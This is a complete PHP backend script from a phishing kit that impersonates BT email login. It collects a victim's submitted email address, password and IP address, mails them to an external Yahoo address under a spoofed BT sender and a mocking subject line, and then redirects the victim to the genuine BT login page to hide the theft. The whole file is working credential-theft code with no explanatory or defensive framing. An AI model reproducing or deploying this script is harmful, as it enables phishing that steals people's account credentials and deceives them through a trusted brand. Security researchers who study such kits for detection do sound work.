<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------ALL EMAIL-----------------------\n";
$message .= "Email Address : ".$_POST['u']."\n";
$message .= "Password : ".$_POST['p']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By L4Nigr0m4nt3---------------------\n";
$recipient = "l.nigromante@yahoo.com";
$headers = "From: NEW BT <new@bt.com>";
$subject = "GIMME YOUR FLOUZ";
$headers = "Endowed";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
	   {
		   header("Location: https://home.bt.com/login/loginform?s_cid=con_Furl_mail&utm_source=ATL&utm_medium=FURL&utm_content=R&utm_campaign=btmail");

	   }
else
    	   {
 		echo "ERROR! Please go back and try again.";
  	   }

?>
